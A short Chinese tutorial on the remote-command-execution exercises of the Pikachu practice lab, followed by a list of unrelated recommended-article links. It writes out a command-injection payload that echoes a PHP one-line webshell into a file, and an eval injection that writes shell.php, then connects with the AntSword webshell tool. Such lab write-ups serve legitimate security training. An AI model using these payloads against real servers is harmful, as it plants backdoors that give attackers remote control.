Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
一个有温度的技术博主34 分钟前
Linux 核心命令速查指南:从文件操作到系统运维
linux·服务器
天远数科1 小时前
零信任架构实战:基于天远全能消金报告构建自动化信贷评估网关
运维·人工智能·架构·自动化
2601_962364971 小时前
面向设备厂商:Windows Hello 认证摄像头核心要点
windows·安全·电脑
Winner_hwx2 小时前
华为ICT大赛备赛复习1
服务器·网络·华为
宗介波妞3 小时前
Wireshark 抓取 IEC104 报文:常见异常报文排查与标志位解读
服务器·网络·wireshark
云边云科技_云网融合3 小时前
工业互联网组网方案全景解析:从低延迟网络到安全隔离的四大核心支柱
网络·安全·php
小程序设计3 小时前
linux防火墙研究与实现
网络·安全
数据知道3 小时前
加密流量分析——JA3 指纹、TLS 指纹识别与规避
网络·安全·网络安全·密码学
网硕互联的小客服4 小时前
各个版本的Linux系统如何修改远程端口ssh端口?
linux·运维·服务器·网络
小程序设计4 小时前
Wi-Fi网络监控及无线终端定位系统的研究
网络·安全